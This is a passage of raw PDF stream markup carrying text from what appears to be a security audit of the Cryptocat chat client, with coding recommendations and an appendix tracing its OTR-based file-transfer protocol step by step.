(Cryptocat.fileSize ) Tj /F1 10 Tf (should be named ) Tj /F4 10 Tf (Cryptocat.maximumFileSize) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 255.0236 cm Q q 1 0 0 1 62.69291 207.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .958651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (seq ) Tj /F1 10 Tf (parameter in the file-send protocol is maintained in the sender, received by the receiver,) Tj T* 0 Tw .578735 Tw (and stored by the receiver in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (structure, but is not actually used for anything. Remove) Tj T* 0 Tw 1.169431 Tw (all uses of it $since ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf (protocol requires a ) Tj /F4 10 Tf (seq ) Tj /F1 10 Tf (parameter to be sent in the ) Tj /F4 10 Tf (data ) Tj /F1 10 Tf (message, but) Tj T* 0 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (doesn't use that parameter, just hard-code it to 0$.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 201.0236 cm Q q 1 0 0 1 62.69291 141.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.475366 Tw 12 TL /F4 10 Tf 0 0 0 rg (strophe.js) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (getUniqueId ) Tj /F1 10 Tf (is documented as resetting to 0 for each connection, but it actually) Tj T* 0 Tw 24.38747 Tw (resets to a random integer from [0,10000\). Opened ticket) Tj T* 0 Tw 2.965529 Tw 0 0 .501961 rg (https://github.com/strophe/strophejs/issues/35) Tj 0 0 0 rg (. The ticket was closed by the strophe authors by) Tj T* 0 Tw .55186 Tw (setting the ) Tj /F4 10 Tf (uniqueId ) Tj /F1 10 Tf (to 0. This affects ) Tj 0 0 .501961 rg (Issue C. Substitution of File Contents By Hijacking Entry in) Tj T* 0 Tw (User Interface) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 135.0236 cm Q q 1 0 0 1 62.69291 99.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.409984 Tw 12 TL /F1 10 Tf 0 0 0 rg (As documented in ) Tj 0 0 .501961 rg (Appendix B: Work Log) Tj 0 0 0 rg (, we concluded that BOSH is resistant to CSRF attacks) Tj T* 0 Tw .247318 Tw (provided that the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is unguessable. Much later, we realized that the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is) Tj T* 0 Tw (not unguessable. Is there anything else protecting BOSH from CSRF attacks?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 99.02362 cm Q q 1 0 0 1 62.69291 99.02362 cm Q endstream endobj % 'R197': class PDFStream 197 0 obj % page stream << /Length 7201 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm Q q 1 0 0 1 62.69291 702.0236 cm Q q 1 0 0 1 62.69291 600.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 62 Tm .892976 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (implementation guards against ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (attacks by storing potentially attacker-controlled) Tj T* 0 Tw 1.177633 Tw (data, such as nicknames, as strings and escaping them close to the point of use. This in practice) Tj T* 0 Tw 2.866905 Tw (results in escaping logic being scattered in many places over the source, including ) Tj /F3 10 Tf (Mustache) Tj T* 0 Tw .35104 Tw /F1 10 Tf (templates as part of the source; if any one of the necessary places is omitted, there may be an ) Tj /F3 10 Tf (XSS) Tj T* 0 Tw .029988 Tw /F1 10 Tf (vulnerability. If instead such data were held in an object that is not usable directly as a string, it would) Tj T* 0 Tw (be much easier to ensure consistent and auditable validation and escaping.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .449984 Tw 12 TL /F1 10 Tf 0 0 0 rg ($In ) Tj /F3 10 Tf (JavaScript ) Tj /F1 10 Tf (all objects have implicit coercions to string; however, the implicit coercion may yield a) Tj T* 0 Tw (harmless constant, in which case it is not a security risk for it to be invoked accidentally.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 594.0236 cm Q q 1 0 0 1 62.69291 414.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 165 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 105 cm q BT 1 0 0 1 0 62 Tm .031098 Tw 12 TL /F1 10 Tf 0 0 0 rg (A common idiom in ) Tj /F3 10 Tf (Javascript ) Tj /F1 10 Tf (code is for a function to behave differently depending on the type of its) Tj T* 0 Tw 2.265318 Tw (arguments. This can make it harder for reviewers to correctly trace control flow $as they might) Tj T* 0 Tw 1.707984 Tw (misinterpret or misremember which of the behaviors of the function will be executed in a certain) Tj T* 0 Tw 3.234597 Tw (case$, and can similarly lead developers to call the function incorrectly. Some of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s) Tj T* 0 Tw .446651 Tw (dependent libraries use this idiom. We would recommend to the authors of ) Tj /F3 10 Tf (those ) Tj /F1 10 Tf (libraries to instead) Tj T* 0 Tw (write separate functions for each separate behavior.) Tj T* ET Q Q q 1 0 0 1 23 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Examples:) Tj T* ET Q Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 57 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.014418 Tw 12 TL /F4 10 Tf 0 0 0 rg (OTR.prototype._sendMsg ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf ($from the otr.js codebase$, which does something) Tj T* 0 Tw (different if its second argument is true.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 51 cm Q q 1 0 0 1 23 27 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.136976 Tw 12 TL /F4 10 Tf 0 0 0 rg (OTR.prototype._sendMsg ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf (also does something different if its ) Tj /F4 10 Tf (msgstate ) Tj /F1 10 Tf (is) Tj T* 0 Tw /F4 10 Tf (CONST.MSGSTATE_PLAINTEXT) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.38247 Tw 12 TL /F4 10 Tf 0 0 0 rg (selectCipherStrategy ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (cipher-core.js ) Tj /F1 10 Tf ($from the crypto-js codebase$ is scary,) Tj T* 0 Tw (because what it does depends on whether the type of its ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (argument is string or other.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 408.0236 cm Q q 1 0 0 1 62.69291 324.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 74 Tm 1.531235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Cryptocat itself uses in one place a similar idiom, of returning different types of argument from a) Tj T* 0 Tw 3.190888 Tw (function in different cases. This is in ) Tj /F4 10 Tf (Cryptocat.getBytes) Tj /F1 10 Tf (, which returns different types) Tj T* 0 Tw 1.569398 Tw (depending on whether its first argument is 1 or a number greater than 1. As mentioned in ) Tj 0 0 .501961 rg (Open) Tj T* 0 Tw 2.593976 Tw (Questions & Concerns) Tj 0 0 0 rg (, ) Tj /F4 10 Tf (Cryptocat.encodedBytes ) Tj /F1 10 Tf (doesn't take into account the fact that) Tj T* 0 Tw 11.21098 Tw /F4 10 Tf (Cryptocat.getBytes) Tj /F1 10 Tf ('s return value is of varying type, so if you invoke) Tj T* 0 Tw 2.935976 Tw /F4 10 Tf (Cryptocat.encodedBytes$1,) Tj ( ) Tj (\205$) Tj /F1 10 Tf (, it will throw an exception. We recommend making each) Tj T* 0 Tw (function return the same type of object in all cases.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 318.0236 cm Q q 1 0 0 1 62.69291 282.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 5.139069 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (codebase makes heavy use of a ) Tj /F4 10 Tf (.extend ) Tj /F1 10 Tf (prototypical inheritance by) Tj T* 0 Tw .67784 Tw (copy-then-modify. Additionally it has a very deep abstraction hierarchy for only a few actual ciphers) Tj T* 0 Tw (and modes. These two styles make it extremely cumbersome to audit by source.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 276.0236 cm Q q 1 0 0 1 62.69291 240.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.989398 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (structure which has two slots, 0, and 1, should instead be a struct with named slots.) Tj T* 0 Tw .303828 Tw (Recommendation: Use named properties rather than fixed Array indices $tuple-style$, or if tuple style) Tj T* 0 Tw (has some advantage, define constants for the indices, rather than using magic constants.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 240.0236 cm Q q 1 0 0 1 62.69291 240.0236 cm Q endstream endobj % 'R198': class PDFStream 198 0 obj % page stream << /Length 9354 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix A: The life cycle of the Cryptocat file transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.571318 Tw (Here are our notes describing our understanding of the Cryptocat file transfer protocol, along with the) Tj T* 0 Tw .968876 Tw (parts of the rest of the protocols that are necessary to evaluate the security of the file transfer protocol.) Tj T* 0 Tw (This is described in chronological order of one $or more$ file transfers.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm Q q 1 0 0 1 62.69291 696.0236 cm Q q 1 0 0 1 62.69291 642.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The server tells a client there is a Presence session, with a Nickname.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .377633 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: there is no attempt to enforce constraints on what Nickname gets used, other than that it can't) Tj T* 0 Tw 1.734104 Tw (be currently in use $see ) Tj 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the same Nickname, Your) Tj T* 0 Tw (Friend Thinks The Attacker is You) Tj 0 0 0 rg ($.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 540.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 81 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 69 cm q BT 1 0 0 1 0 14 Tm .670651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Now the server can deliver messages between clients, which ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (uses to do its protocol, resulting) Tj T* 0 Tw (in a ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (shared secret.) Tj T* ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 26 Tm .557126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: if the user does not perform the optional Socialist Millionaire Protocol authentication, then this) Tj T* 0 Tw 1.25186 Tw (is vulnerable to a Man-In-The-Middle attack $see ) Tj 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the) Tj T* 0 Tw (same Nickname, Your Friend Thinks The Attacker is You) Tj 0 0 0 rg ($.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.878735 Tw 12 TL /F1 10 Tf 0 0 0 rg (The resulting ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (keys are stored in an ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object, which is stored in a hashtable named) Tj T* 0 Tw /F4 10 Tf (otrKeys) Tj /F1 10 Tf (, indexed by the Nickname.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 534.0236 cm Q q 1 0 0 1 62.69291 432.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 63 cm q BT 1 0 0 1 0 26 Tm 1.50436 Tw 12 TL /F3 10 Tf 0 0 0 rg (OTR ) Tj /F1 10 Tf (generates a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret "on every round trip" $see below for precisely what that) Tj T* 0 Tw .649987 Tw (means$. After it generates a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret, it begins using it to protect all messages that it) Tj T* 0 Tw (sends from that time on.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm .254987 Tw 12 TL /F1 10 Tf 0 0 0 rg (By "on every round trip" means: after a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret is generated, then the next ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (Data) Tj T* 0 Tw 1.781318 Tw (Message sent will contain an advertisement of a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key. After that advertisement is) Tj T* 0 Tw 2.987485 Tw (received by the peer, then the next ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (Data Message that the peer sends will contain an) Tj T* 0 Tw .55784 Tw (acknowledgement of his receipt of that new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key. Once that acknowledgement is received) Tj T* 0 Tw (by first party, it will begin using the new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key which will result in a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 426.0236 cm Q q 1 0 0 1 62.69291 114.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 297 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 285 cm q BT 1 0 0 1 0 14 Tm 4.039318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever a client initiates a file send, then all the following things happen $in order and) Tj T* 0 Tw (synchronously$ in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client on the file transmitter side:) Tj T* ET Q Q q 1 0 0 1 23 279 cm Q q 1 0 0 1 23 279 cm Q q 1 0 0 1 23 243 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .39998 Tw (The file transmitter generates a random 128-bit number encoded in hexadecimal, and appends) Tj T* 0 Tw 1.18186 Tw (the file's extension. We'll call this the "file identifier", although in the source code it is usually) Tj T* 0 Tw (called the "filename".) Tj T* ET Q Q q Q Q q 1 0 0 1 23 237 cm Q q 1 0 0 1 23 171 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 38 Tm 1.655697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object sends the file identifier $called a "filename" in this protocol$, encrypted and) Tj T* 0 Tw .798443 Tw (authenticated, through ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf ($using the current ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret$, and calls back to ) Tj /F3 10 Tf (Cryptocat) Tj T* 0 Tw 2.149318 Tw /F1 10 Tf (to deliver an "extra symmetric key" $which is derived by ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (from the current ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared) Tj T* 0 Tw (secret$.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg ($See the call to ) Tj /F4 10 Tf (on\('file',) Tj ( ) Tj (\205$ ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (handlePresence ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 165 cm Q q 1 0 0 1 23 63 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 6.22 0 Td (c.) Tj T* -6.22 0 Td ET Q Q q 1 0 0 1 23 39 cm q BT 1 0 0 1 0 50 Tm .768651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter diversifies the extra symmetric key into an encryption key and a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key,) Tj T* 0 Tw .611318 Tw (and stores the pair of keys $encryption key and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key$ in the hashtable named ) Tj /F4 10 Tf (fileKeys) Tj T* 0 Tw .084104 Tw /F1 10 Tf (under the index of the nickname of the intended file-receiver and then under the index of the file) Tj T* 0 Tw .932126 Tw (identifier: i.e. if the source code used this terminology, the indexing into ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (would be) Tj T* 0 Tw (written ) Tj /F4 10 Tf (fileKeys[receiversNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.099984 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The same ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (-generated key can be used for multiple file transfers here $see ) Tj 0 0 .501961 rg (Issue A.) Tj T* 0 Tw 1.394104 Tw (Disclosure of File Contents Due to Re-use Of Key and IV ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Issue B. Integrity Key and IV) Tj T* 0 Tw (Reuse in File Transfer) Tj 0 0 0 rg ($.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 57 cm Q q 1 0 0 1 23 3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (d.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 14 Tm .675318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then generates an ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (, which is guaranteed to be unique within the scope) Tj T* 0 Tw (of that ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client's current connection to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (server.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .196905 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. If the client disconnects and reconnects to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (server, then subsequently generated) Tj T* 0 Tw (sids could collide.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 76.86614 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 24.15748 Tm T* ET q 1 0 0 1 23 3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 16.15748 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (e.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 4.15748 cm q BT 1 0 0 1 0 14 Tm .625984 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter stores the filehandle $giving access to the file on the local filesystem$, the ) Tj T* 0 Tw .071412 Tw (nickname of the receiver, the encryption and authentication keys, and a counter in a hashtable) Tj T* 0 Tw ET Q Q q Q Q q Q Q endstream endobj % 'R199': class PDFStream 199 0 obj % page stream << /Length 9601 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 615.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 137 Tm T* ET q 1 0 0 1 23 123 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 11 Tm T* ET q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 16.98997 Tw 12 TL /F1 10 Tf 0 0 0 rg (named ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (, indexed by the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. $See) Tj T* 0 Tw /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 8.44 0 Td (f.) Tj T* -8.44 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 62 Tm .944651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter initiates a strophe file transfer, which sends the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (and the file identifier) Tj T* 0 Tw 1.198314 Tw ($called a "filename" in this protocol$ over an unencrypted and unauthenticated protocol. $This) Tj T* 0 Tw .64248 Tw (message is unencrypted and unauthenticated at ) Tj /F3 10 Tf (this ) Tj /F1 10 Tf (layer, not at the underlying client) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (server) Tj T* 0 Tw 1.578651 Tw (transport layer; i.e. the server is going to see and have the opportunity to manipulate those) Tj T* 0 Tw 1.296457 Tw (values, and unless both clients use ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (to the server, then other parties will as well.$ In the) Tj T* 0 Tw (same message, the file transmitter client also includes a file size and ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (type.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 15.36496 Tw 12 TL /F1 10 Tf 0 0 0 rg ($See ) Tj /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (send ) Tj /F1 10 Tf (in) Tj T* 0 Tw /F4 10 Tf (strophe.si-filetransfer.js) Tj /F1 10 Tf (.$) Tj T* ET Q Q q Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (g.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then deletes ) Tj /F4 10 Tf (fileKeys[receiversNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 129.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 465 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (5.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 453 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .557984 Tw (Now the following events might eventually occur in the intended file-receiver, as caused by some of) Tj T* 0 Tw (the network sends in step 4 $"Whenever a file transfer is initiated"$, above.) Tj T* ET Q Q q 1 0 0 1 23 447 cm Q q 1 0 0 1 23 447 cm Q q 1 0 0 1 23 375 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.096905 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever the encrypted and authenticated file identifier is received over the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol in) Tj T* 0 Tw .112927 Tw (the receiver, the ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object calls back to the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code to deliver the file identifier and the) Tj T* 0 Tw .388555 Tw (extra symmetric key. The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code in the file receiver diversifies the extra symmetric key) Tj T* 0 Tw 1.03528 Tw (into an encryption key and a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key, and stores the pair of keys $encryption key and ) Tj /F3 10 Tf (MAC) Tj T* 0 Tw .188735 Tw /F1 10 Tf (key$ in the hashtable named ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (under the index of the nickname of the file sender and) Tj T* 0 Tw (then under the index of the file identifier: i.e. ) Tj /F4 10 Tf 